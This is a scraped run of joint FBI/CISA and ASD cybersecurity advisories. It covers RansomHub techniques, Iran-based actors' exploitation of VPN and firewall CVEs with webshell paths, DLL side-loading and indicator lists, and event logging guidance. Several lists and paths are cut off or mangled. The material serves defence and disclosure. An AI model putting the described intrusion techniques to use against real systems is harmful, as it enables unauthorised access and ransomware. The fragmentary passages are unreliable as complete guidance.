---|---|---|
Phishing | T1566 | RansomHub affiliates used mass phishing and spear-phishing emails to obtain initial access. |
Exploit Public-Facing Application | T1190 | RansomHub affiliates may exploit known vulnerabilities to obtain initial access. |
Technique Title | ID | Use |
---|---|---|
Command and Scripting Interpreter | T1059.001 | RansomHub affiliates used PowerShell and Scripts to quickly run and automate intrusion. |
Windows Management Instrumentation | T1047 | RansomHub affiliates may abuse Windows Management Instrumentation to execute malicious commands and payloads. |
Technique Title | ID | Use |
---|---|---|
Command and Scripting Interpreter | T1059.001 | RansomHub affiliates used PowerShell and Scripts to quickly run and automate intrusion. |
Create Account | T1136 | RansomHub affiliates may create an account to maintain access to victim systems. |
Technique Title | ID | Use |
---|---|---|
Account Manipulation | T1098 | RansomHub affiliates may manipulate accounts to maintain and/or elevate access to victim systems. |
Remote Services: Remote Desktop Protocol | T1021.001 | RansomHub affiliates may log onto systems using the Remote Desk Protocol, then perform actions as the logged-on user. |
Technique Title | ID | Use |
---|---|---|
Masquerading | T1036 | RansomHub affiliates may hide binaries by renaming executable names. |
Indicator Removal on Host | T1070 | RansomHub affiliates may remove logs to inhibit cybersecurity response. |
Impair Defenses: Disable or Modify Tools | T1562.001 | RansomHub affiliates may disable endpoint detection and response (EDR) tooling to avoid detection. |
Technique Title | ID | Use |
---|---|---|
OS Credential Dumping | T1003 | RansomHub affiliates used Mimikatz on Windows systems to gather credentials. |
Brute Force: Password Spraying | T1110.003 | RansomHub affiliates may use password spraying to obtain initial access. |
Technique Title | ID | Use |
---|---|---|
Remote System Discovery | T1018 | RansomHub affiliates may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. |
Network Service Discovery | T1046 | RansomHub affiliates may attempt to get a listing of services running on remote hosts and local network infrastructure devices, |
Technique Title | ID | Use |
---|---|---|
Exploitation of Remote Services | T1210 | RansomHub affiliates may exploit remote service to gain unauthorized access to internal systems once inside of a network. |
Technique Title | ID | Use |
---|---|---|
Remote Access Software | T1219 | RansomHub affiliates may use Anydesk, a legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. |
Technique Title | ID | Use |
---|---|---|
Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | T1048.002 | RansomHub affiliates may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. |
Transfer Data to Cloud Account | T1537 | RansomHub affiliates may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service. |
Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Unencrypted Non-C2 Protocol | T1048.003 | RansomHub affiliates may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. |
Technique Title | ID | Use |
---|---|---|
Data Encrypted for Impact | T1486 | RansomHub affiliates used encryption for ransomware operations. |
Inhibit System Recovery | T1490 | RansomHub ransomware deleted volume shadow copies and affiliates removed backups for ransomware operations. |
If compromise is detected, organizations should:
The authoring organizations recommend organizations implement the mitigations below to improve cybersecurity posture based on RansomHub’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
The above mitigations apply to enterprises and critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of many of these flaws and that the responsibility should not be on the end user, CISA urges software manufacturers to implement the following to reduce the prevalence of identified or exploited issues (e.g., misconfigurations, weak passwords, and other weaknesses identified and exploited through the assessment team):
These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.
For more information on secure by design, see CISA’s Secure by Design webpage.
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA, FBI, MS-ISAC, and HHS recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.
The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.
The authoring organizations do not encourage paying a ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472).
The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring organizations.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that, as of August 2024, a group of Iran-based cyber actors continues to exploit U.S. and foreign organizations. This includes organizations across several sectors in the U.S. (including in the education, finance, healthcare, and defense sectors as well as local government entities) and other countries (including in Israel, Azerbaijan, and the United Arab Emirates). The FBI assesses a significant percentage of these threat actors’ operations against US organizations are intended to obtain and develop network access to then collaborate with ransomware affiliate actors to deploy ransomware. The FBI further assesses these Iran-based cyber actors are associated with the Government of Iran (GOI) and—separate from the ransomware activity—conduct computer network exploitation activity in support of the GOI (such as intrusions enabling the theft of sensitive technical data against organizations in Israel and Azerbaijan).
This CSA provides the threat actor’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs), as well as highlights similar activity from a previous advisory (Iran-Based Threat Actor Exploits VPN Vulnerabilities) that the FBI and CISA published on Sept. 15, 2020. The information and guidance in this advisory are derived from FBI investigative activity and technical analysis of this group’s intrusion activity against U.S. organizations and engagements with numerous entities impacted by this malicious activity.
The FBI recommends all organizations follow guidance provided in the Mitigations section of this advisory to defend against the Iranian cyber actors’ activity.
If organizations believe they have been targeted or compromised by the Iranian cyber actors, the FBI and CISA recommend immediately contacting your local FBI field office for assistance and/or reporting the incident via CISA’s Incident Reporting Form (see the Reporting section of this advisory for more details and contact methods).
For more information on Iran state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat webpage.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
This advisory outlines activity by a specific group of Iranian cyber actors that has conducted a high volume of computer network intrusion attempts against U.S. organizations since 2017 and as recently as August 2024. Compromised organizations include U.S.-based schools, municipal governments, financial institutions, and healthcare facilities. This group is known in the private sector by the names Pioneer Kitten, Fox Kitten, UNC757, Parisite, RUBIDIUM, and Lemon Sandstorm.[1][2] The actors also refer to themselves by the moniker Br0k3r, and as of 2024, they have been operating under the moniker “xplfinder” in their channels. FBI analysis and investigation indicate the group’s activity is consistent with a cyber actor with Iranian state-sponsorship.
The FBI previously observed these actors attempt to monetize their access to victim organizations on cyber marketplaces. A significant percentage of the group’s US-focused cyber activity is in furtherance of obtaining and maintaining technical access to victim networks to enable future ransomware attacks. The actors offer full domain control privileges, as well as domain admin credentials, to numerous networks worldwide. More recently, the FBI identified these actors collaborating directly with ransomware affiliates to enable encryption operations in exchange for a percentage of the ransom payments. These actors have collaborated with the ransomware affiliates NoEscape[3], Ransomhouse[4], and ALPHV (aka BlackCat) (#StopRansomware: ALPHV Blackcat). The Iranian cyber actors’ involvement in these ransomware attacks goes beyond providing access; they work closely with ransomware affiliates to lock victim networks and strategize on approaches to extort victims. The FBI assesses these actors do not disclose their Iran-based location to their ransomware affiliate contacts and are intentionally vague as to their nationality and origin.
Furthermore, the FBI has historically observed this actor conduct hack-and-leak campaigns, such as the late 2020 campaign known as Pay2Key.[5],[6] The actors operated a .onion
site (reachable through the Tor browser) hosted on cloud infrastructure registered to an organization previously compromised by the actors. (The actors created the server leveraging their prior access to this victim.) Following the compromise and the subsequent unauthorized acquisition of victim data, the actors publicized news of their compromise (including on social media), tagging accounts of victim and media organizations, and leaking victim data on their .onion
site. While this technique has traditionally been used to influence victims to pay ransoms, the FBI does not believe the objective of Pay2Key was to obtain ransom payments. Rather, the FBI assesses Pay2Key was an information operation aimed at undermining the security of Israel-based cyber infrastructure.
FBI investigation identified that the Iranian cyber actors conduct malicious cyber activity, which FBI assessed to be in support of the GOI. The FBI judges this activity to be separate from the previously referenced ransomware-enabling activity. This group directs their activity towards countries and organizations consistent with Iranian state interests, and typically not of interest to the group’s ransomware affiliate contacts, such as U.S. defense sector networks, and those in Israel, Azerbaijan, United Arab Emirates. Instead, it is intended to steal sensitive information from these networks, suggesting the group maintains an association with the GOI. However, the group’s ransomware activities are likely not sanctioned by the GOI, as the actors have expressed concern for government monitoring of cryptocurrency movement associated with their malicious activity.
The group uses the Iranian company name Danesh Novin Sahand (identification number 14007585836), likely as a cover IT entity for the group’s malicious cyber activities.
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15.1. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
The Iranian cyber actors’ initial intrusions rely upon exploits of remote external services on internet-facing assets to gain initial access to victim networks. As of July 2024, these actors have been observed scanning IP addresses hosting Check Point Security Gateways, probing for devices potentially vulnerable to CVE-2024-24919. As of April 2024, these actors have conducted mass scanning of IP addresses hosting Palo Alto Networks PAN-OS and GlobalProtect VPN devices. The actors were likely conducting reconnaissance and probing for devices vulnerable to CVE-2024-3400. Historically, this group has exploited organizations by leveraging CVE-2019-19781 and CVE-2023-3519 related to Citrix Netscaler, and CVE-2022-1388 related to BIG-IP F5 devices.
The actors have been observed using the Shodan search engine to identify and enumerate IP addresses that host devices vulnerable to a particular CVE. The actors’ initial access is usually obtained via exploiting a public-facing networking device, such as Citrix Netscaler (CVE-2019-19781 and CVE-2023-3519), F5 BIG-IP (CVE-2022-1388), Pulse Secure/Ivanti VPNs (CVE-2024-21887), and, more recently, PanOS firewalls (CVE-2024-3400) [T1596][T1190].
Following exploitation of vulnerable devices, the actors use the following techniques:
netscaler.1
in the same directory as the webshell [T1505.003][T1056]./var/vpn/themes/imgs/
on Citrix Netscaler devices to deploy a webshell [T1505.003]. Malicious files deployed to this directory include:
netscaler.1
netscaler.php
ctxHeaderLogon.php
/netscaler/logon/LogonPoint/uiareas/ui_style.php
/netscaler/logon/sanpdebug.php
/xui/common/images/
on targeted IP addresses [T1133].Windows/Spaceport/
task folder. This task uses a DLL side-loading technique against the signed Microsoft SysInternals executable contig.exe
, which may be renamed to dllhost.ext
, to load a payload from version.dll. This file has been observed being executed from the Windows Downloads directory [T1053]. C:WindowsADFS
directory [T1505.003].C:Windowssystem32drivers
directory. For example, a service named “test” was observed attempting to load a file located at C:WINDOWSsystem32driverstest.sys
[T1505].files.catbox[.]moe
. Catbox is a free, online file hosting site the actors use as a repository/hosting mechanism [T1059.001].After infiltrating victim networks, the actors collaborate with ransomware affiliates (including NoEscape, Ransomhouse, and ALPHV [aka BlackCat]) in exchange for a percentage of the ransom payments by providing affiliates with access to victim networks, locking victim networks, and strategizing to extort victims [T1657]. The actors also conduct what is assessed to be separate set of malicious activity—stealing sensitive data from victims [TA0010], likely in support of the GOI.
See Table 1 to Table 9 for all referenced threat actor tactics and techniques in this advisory.
Technique Title | ID | Use or Assessed Use |
---|---|---|
Search Open Technical Databases | T1596 | Iranian cyber actors use Shodan (Shodan[.]io ) to identify internet infrastructure hosting devices vulnerable to particular CVEs. |
Technique Title | ID | Use or Assessed Use |
---|---|---|
Exploit Public-Facing Application | T1190 |
Iranian cyber actors scan and exploit public-facing networking devices, including the following devices and associated CVEs:
|
External Remote Services | T1133 | Iranian cyber actors create /xui/common/images/ directory on targeted IP addresses. |
Technique Title | ID | Use or Assessed Use |
---|---|---|
Server Software Component: Web Shell | T1505.003 | Iranian cyber actors capture login credentials on compromised Netscaler devices via deployed webshell; create a directory on Netscaler devices for webshell deployment; deploy webshells on compromised Netscaler devices in two directories (observed closely after system owning patching); and place the malicious backdoor version.dll . |
Create Account (Local Account) | T1136.001 | Iranian cyber actors create local accounts on victim networks. |
Account Manipulation | T1098 | Iranian cyber actors request exemptions to zero-trust application for tools they intend to deploy. |
Scheduled Task/Job | T1053 | Iranian cyber actors implement a scheduled task that uses a DLL side-loading technique and a scheduled task that loads malware through back doors. |
Server Software Component | T1505 | Iranian cyber actors implement the daily creation of a Windows service task for persistence as detection and mitigation occur. |
Technique Title | ID | Use or Assessed Use |
---|---|---|
Valid Accounts: Local Accounts | T1078.003 | Iranian cyber actors repurpose compromised credentials (e.g., from a Netscaler device) to log into other applications. |
Valid Accounts: Domain Accounts | T1078.002 | Iranian cyber actors repurpose administrative credentials of network admins to log into domain controllers and other infrastructure. |
Technique Title | ID | Use or Assessed Use |
---|---|---|
Impair Defenses: Disable or Modify Tools | T1562.001 | Iranian cyber actors use administrator credentials to disable antivirus and security software. |
Impair Defenses: Disable or Modify Tools | T1562.001 | Iranian cyber actors attempt to enter security exemption tickets to the network security device or contractor to get their tools allowlisted. |
Impair Defenses: Downgrade Attack | T1562.010 | Iranian cyber actors lower PowerShell policies to a less secure level. |
Technique Title | ID | Use or Assessed Use |
---|---|---|
Input Capture | T1056 | Iranian cyber actors capture login credentials on compromised Netscaler devices via a deployed webshell. |
Technique Title | ID | Use or Assessed Use |
---|---|---|
Command and Scripting | T1059.001 | Iranian cyber actors use an admin account to initiate a remote desktop session to start Microsoft Windows PowerShell ISE. |
Command and Scripting Interpreter | T1059.001 | Iranian cyber actors enable servers to use Windows PowerShell Web Access. |
Technique Title | ID | Use or Assessed Use |
---|---|---|
Query Registry | T1012 | Iranian cyber actors export registry hives and network firewall configurations. |
Domain Trust Discovery | T1482 | Iranian cyber actors exfiltrate account usernames from the domain controller and access configuration files and logs. |
Technique Title | ID | Use or Assessed Use |
---|---|---|
Remote Access Software | T1219 |
Iranian cyber actors install “AnyDesk” remote access program. Iranian cyber actors deploy Meshcentral to connect with compromised servers for remote access. |
Protocol Tunneling | T1572 | Iranian cyber actors use ligolo / ligolo-ng for open source tunneling and ngrok[.]io NGROK to create outbound connections to a random subdomain. |
Disclaimer: The IP addresses and domains listed in Table 10 were observed in use by the actors in the specified timeframes in 2024. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.
Comment: In addition to the infrastructure provided in the table below, the FBI and CISA warn that these actors are known to leverage information obtained through intrusions into cloud-computing resources associated with victim organizations. The actors have used this cloud infrastructure to conduct further cyber operations targeting other organizations. The FBI observed use of this tradecraft against U.S. academic and defense sectors, but it could theoretically be used against any organization. The FBI and CISA warn that if these actors compromised your organization, they may be leveraging your cloud services accounts to conduct malicious cyber activity and target other victims. The FBI has observed instances of the actors using compromised cloud service accounts to transmit data stolen from other compromised organizations.
Indicator | First Seen | Most Recently Observed Date |
---|---|---|
138.68.90[.]19 | January 2024 | August 2024 |
167.99.202[.]130 | January 2024 | August 2024 |
78.141.238[.]182 | July 2024 | August 2024 |
51.16.51[.]81 | January 2024 | August 2024 |
51.20.138[.]134 | February 2024 | August 2024 |
134.209.30[.]220 | March 2024 | August 2024 |
13.53.124[.]246 | February 2024 | August 2024 |
api.gupdate[.]net | September 2022 | August 2024 |
githubapp[.]net | February 2024 | August 2024 |
Disclaimer: The infrastructure in Table 11 reflects historical IP addresses and domains associated with these actors. This data is being provided for informational purposes and to enable better tracking and attribution of these actors. The FBI and CISA do not recommend blocking of the indicators in Table 11 based solely on their inclusion in this CSA.
Indicator | First Seen | Most Recently Observed Date |
---|---|---|
18.134.0[.]66 | September 2023 | November 2023 |
193.149.190[.]248 | September 2023 | January 2024 |
45.76.65[.]42 | September 2023 | December 2023 |
206.71.148[.]78 | October 2023 | January 2024 |
193.149.187[.]41 | October 2023 | November 2023 |
login.forticloud[.]online | October 2023 | November 2023 |
fortigate.forticloud.[]online | October 2023 | November 2023 |
cloud.sophos[.]one | October 2023 | November 2023 |
Disclaimer: The FBI observed the following identifiers associated with the Iranian cyber group and their ransomware affiliates. The FBI is providing this information to enable improved threat actor identification and tracking of malicious cyber activity. Please see Appendix A for list of TOX identifiers.
The FBI observed the threat actors to be associated with the following bitcoin address values:
bc1q8n7jjgdepuym825zwwftr3qpem3tnjx3m50ku0
bc1qlwd94gf5uhdpu4gynk6znc5j3rwk9s53c0dhjs
bc1q2egjjzmchtm3q3h3een37zsvpph86hwgq4xskh
bc1qjzw7sh3pd5msgehdaurzv04pm40hm9ajpwjqky
bc1qn5tla384qxpl6zt7kd068hvl7y4a6rt684ufqp
bc1ql837eewad47zn0uzzjfgqjhsnf2yhkyxvxyjjc
bc1qy8pnttrfmyu4l3qcy59gmllzqq66gmr446ppcr
bc1q6620fmev7cvkfu82z43vwjtec6mzgcp5hjrdne
bc1qr6h2zcxlntpcjystxdf7qy2755p25yrwucm4lq
bc1qx9tteqhama2x2w9vwqsyny6hldh8my8udx5jlm
bc1qz75atxj4dvgezyuspw8yz9khtkuk5jpdgfauq8
bc1q6w2an66vrje747scecrgzucw9ksha66x9zt980
bc1qsn4l6h3mhyhmr72vw4ajxf2gr74hwpalks2tp9
bc1qtjhvqkun4uxtr4qmq6s3f7j49nr4sp0wywp489
The FBI and CISA recommend all organizations implement the mitigations listed below to improve their cybersecurity posture based on the Iranian cyber group’s activity. The FBI judges the group’s targeting is primarily based on the identification of devices vulnerable to CVEs named in this notification (see Technical Details section for a list of CVEs). As such, any U.S. organization deploying software with these vulnerabilities may be targeted for further exploitation and should follow this guidance to defend against exploitation by this group.
These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
The FBI and CISA recommend all organizations implement the following mitigations:
files.catbox[.]moe
and ***.ngrok[.]io
[CPG 3.A].In addition to applying mitigations, the FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Your organization has no obligation to respond or provide information back to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.
The FBI and CISA are interested in any information that can be shared in the case of a ransomware incident, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.
The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complain Center (IC3), your local FBI Field Office, or CISA via the agency’s Incident Reporting Form or its 24/7 Operations Center (report@cisa.gov), or by calling 1-844-Say-CISA (1-844-729-2472).
U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to the FBI’s Internet IC3 or your local FBI Field Office. Report suspicious or malicious cyber activity to CISA via the agency’s Incident Reporting Form or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
The information in this report is being provided “as is” for informational purposes only. The FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.
August 20, 2024: Initial version.
TOX Identifier | TOX Public Key | Comment |
---|---|---|
xplfinder | ea2ec0c3859d8d8c36d95a298beef6d7add17856655bfbea2554b8714f7c7c69 | Iranian cyber group |
Br0k3r | B761680E23F2EBB5F6887D315EBD05B2D7C365731E093B49ADB059C3DCCAA30C | Iranian cyber group |
Access | 185ADA4556737A4F26AE16F1A99CA82AB5684C32719EE426C420C0BC14384A0A | Ransomware affiliate |
Admin ALPHV aka BlackCat | 3488458145EB62D7D3947E3811234F4663D9B5AEEF6584AB08A2099A7F946664 | Ransomware affiliate |
Admin_NoEscape | 0A6F992E1372DB4F245595424A7436EBB610775D6ADDC4D568ACC2AF5D315221 | Ransomware affiliate |
Americano_Sneeckers | 14F8AD7D1553D1A47CF4C9E7BEDABCC5B759C86E54C636175A472C11D7DEC70F | Ransomware affiliate |
Bettersock | 2C76104C9AAAF32453A814C227E7D9D755451B551A3FD30D2EA332DF396B3A31 | Ransomware affiliate |
This publication defines a baseline for event logging best practices to mitigate cyber threats. It was developed by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) in cooperation with the following international partners:
Event logging supports the continued delivery of operations and improves the security and resilience of critical systems by enabling network visibility. This guidance makes recommendations that improve an organization’s resilience in the current cyber threat environment, with regard for resourcing constraints. The guidance is of moderate technical complexity and assumes a basic understanding of event logging.
An effective event logging solution aims to:
There are four key factors to consider when pursuing logging best practices:
To access the PDF version of this report, visit here.
The increased prevalence of malicious actors employing LOTL techniques, such as LOTL binaries (LOLBins) and fileless malware, highlights the importance of implementing and maintaining an effective event logging solution. As demonstrated in the joint-sealed publication Identifying and Mitigating Living Off the Land Techniques, advanced persistent threats (APTs) are employing LOTL techniques to evade detection. The purpose of this publication is to detail best practice guidance for event logging and threat detection for cloud services, enterprise networks, enterprise mobility, and operational technology (OT) networks. The guidance in this publication focuses on general best practices for event logging and threat detection; however, LOTL techniques feature as they provide a great case study due to the high difficulty in detecting them.
This guidance is technical in nature and is intended for those within medium to large organizations. As such, it is primarily aimed at:
Developing and implementing an enterprise approved logging policy improves an organization’s chances of detecting malicious behavior on their systems and enforces a consistent method of logging across an organization’s environments. The logging policy should take into consideration any shared responsibilities between service providers and the organization. The policy should also include details of the events to be logged, event logging facilities to be used, how event logs will be monitored, event log retention durations, and when to reassess which logs are worthy of collection.
Organizations are encouraged to implement an event logging policy focused on capturing high-quality cyber security events to aid network defenders in correctly identifying cyber security incidents. In the context of cyber security incident response and threat detection, event log quality refers to the types of events collected rather than how well a log is formatted. Log quality can vary between organizations due to differences in network environments, the reason behind the need to log, differences in critical assets and the organization’s risk appetite.
Useful event logs enrich a network defender’s ability to assess security events to identify whether they are false positives or true positives. Implementing high-quality logging will aid network defenders in discovering LOTL techniques that are designed to appear benign in nature.
Note: Capturing a large volume of well-formatted logs can be invaluable for incident responders in forensics analysis scenarios. However, organizations are encouraged to properly organize logged data into ‘hot’ data storage that is readily available and searchable, or ‘cold’ data storage that has deprioritized availability and is stored through more economical solutions – an important consideration when evaluating an organization's log storage capacity.
For more information on how to prioritize collection of high-quality event logs please refer to CISA’s Guidance for Implementing M-21-3: Improving the Federal Government’s Investigative and Remediation Capabilities.[1]
To strengthen detection of malicious actors employing LOTL techniques, some relevant considerations for event logging include:
As a part of an organization’s event logging policy, captured event logs should contain sufficient detail to aid network defenders and incident responders. If a logging solution fails to capture data relevant to security, its effectiveness as a cyber security incident detection capability is heavily impacted.
The US Office of Management and Budget's M-21-31[2] outlines a good baseline for what an event log should capture, if applicable:
Note: Where possible, all data should be formatted as ‘key-value-pairs’ to allow for easier extraction.
Network administrators and network operators should take into consideration the OT devices within their OT networks. Most OT devices use embedded software that is memory and/or processor constrained. An excessive level of logging could adversely affect the operation of those OT devices. Additionally, such OT devices may not be capable of generating detailed logs, in which case, sensors can be used to supplement logging capabilities. Out-of-band log communications, or generating logs based on error codes and the payloads of existing communications, can account for embedded devices with limited logging capabilities.
When centralizing event logs, organizations should consider using a structured log format, such as JSON, where each type of log captures and presents content consistently (that is, consistent schema, format, and order). This is particularly important when event logs have been forwarded to a central storage facility as this improves a network defender’s ability to search for, filter and correlate event logs. Since logs may vary in structure (or lack thereof), implementing a method of automated log normalization is recommended. This is an important consideration for logs that can change over time or without notice such as software and software-as-a-service (SaaS) logs.
Organizations should consider establishing an accurate and trustworthy time source and use this consistently across all systems to assist network defenders in identifying connections between event logs. This should also include using the same date-time format across all systems. Where possible, organizations should use multiple accurate time sources in case the primary time source becomes degraded or unavailable. Note that, particularly in distributed systems, time zones and distance can influence how timestamps read in relation to each other. Network owners, system owners and cyber security incident responders are encouraged to understand how this could impact their own environments. ASD and co-authors urge organizations to consider implementing the recommendations below to help ensure consistent timestamp collection.
Organizations should ensure they retain logs for long enough to support cyber security incident investigations. Default log retention periods are often insufficient. Log retention periods should be informed by an assessment of the risks to a given system. When assessing the risks to a system, consider that in some cases, it can take up to 18 months to discover a cyber security incident and some malware can dwell on the network from 70 to 200 days before causing overt harm.[3] Log retention periods should also be compliant with any regulatory requirements and cyber security frameworks that may apply in an organization’s jurisdiction. Logs that are crucial in confirming an intrusion and its impact should be prioritized for longer retention.
It is important to review log storage allocations, in parallel with retention periods. Insufficient storage is a common obstacle to log retention. For example, many systems will overwrite old logs when their storage allocation is exhausted. The longer that logs can be kept, the higher the chances are of determining the extent of a cyber security incident, including the potential intrusion vectors that require remediation. For effective security logging practices, organizations should implement data tiering such as hot and cold storage. This ensures that logs can be promptly retrieved to facilitate querying and threat detection.
The following sections detail prioritized lists of log sources for enterprise networks, OT, cloud computing and enterprise mobility using mobile computing devices. The prioritization takes into consideration the likelihood that the logged asset will be targeted by a malicious actor, as well as the impact if the asset were to be compromised. It also prioritizes log sources that can assist in identifying LOTL techniques. Please note that this is not an exhaustive list of log sources and their threats, and their priority may differ between organizations.
Enterprise networks face a large variety of cyber threats. These include malware, malicious insiders, and exploitation of unpatched applications and services. In the context of LOTL, enterprise networks provide malicious actors with a wide variety of native tools to exploit.
ASD and co-authors recommend that organizations prioritize the following log sources within their enterprise network:
ASD and co-authors recommend organizations monitor lower priority logs as well. These include:
Historically, IT and OT have operated separately and have provided distinct functions within organizations. Advancements in technology and digital transformation have led to the growing interconnectedness and convergence of these networks. Organizations are integrating IT and OT networks to enable the seamless flow of data between management systems and industrial operations. Their integration has introduced new cyber threats to OT networks. For example, malicious actors can access OT networks through IT networks by exploiting unpatched vulnerabilities, delivering malware, or conducting denial-of-service campaigns to impact critical services.
ASD and co-authors recommend that organizations prioritize the following log sources in their OT environment:
Note that in cases where OT devices do not support logging, device logs are not available, or are available in a non-standard format, it is good practice to ensure network traffic and communications to and from the OT devices are logged.
Enterprise mobility is an important aspect of an organization’s security posture. Mobile device management (MDM) solutions allow organizations to manage the security of their enterprise mobility, typically including logging functionality. In the context of enterprise mobility, the aim of effective event logging is to detect compromised accounts or devices; for example, due to phishing or interactions with malicious applications and websites.
ASD and co-authors recommend organizations priorities the following log sources in their enterprise mobility solution:
Additional monitoring should be implemented in collaboration with the telecommunications network provider. Such monitoring includes:
Organizations should obtain legal advice about what can be logged from any personally owned mobile devices that are enrolled in an MDM solution. For example, logging GPS location may be subject to restrictions.
ASD and co-authors recommend organizations adjust event logging practices in accordance with the cloud service that is administered, whether infrastructure-as-a-service (IaaS), platform-as-a-service (PaaS), or SaaS are implemented. For example, IaaS would include a significant amount of logging responsibility on the tenant, whereas SaaS would place a significant amount of the logging responsibility on the provider. Therefore, organizations should coordinate closely with their cloud service provider to understand the shared-responsibility model in place, as it will influence their logging priorities. Logging priorities will also be influenced by different cloud computing service models and deployment models (that is, public, private, hybrid, community). Where privacy and data sovereignty laws apply, logging priorities may also be influenced by the location of the cloud service provider’s infrastructure. See NSA’s Manage Cloud Logs for Effective Threat Hunting guidance for additional information.
Organizations should prioritize the following log sources in their use of cloud computing services:
ASD and co-authors recommend that organizations implement a centralized event logging facility such as a secured data lake to enable log aggregation and then forward select, processed logs to analytic tools, such as security information and event management (SIEM) solution and extended detection and response (XDR) solutions. Many commercially available network infrastructure devices have limited local storage. Forwarding event logs to a centralized and secure storage capability prevents the loss of logs once the local device’s storage is exhausted [CPG 2.U]. This can be further mitigated by ensuring default maximum event log storage sizes are configured appropriately on local devices. In the event of a cyber security incident, an absence of historical event logs will frequently have a negative impact on cyber security incident response activities.
ASD and co-authors recommend that organizations implement secure mechanisms such as Transport Layer Security (TLS) 1.3 and methods of cryptographic verification to ensure the integrity of event logs in-transit and at rest. Organizations should prioritize securing and restricting access to event logs that have a justified requirement to record sensitive data.
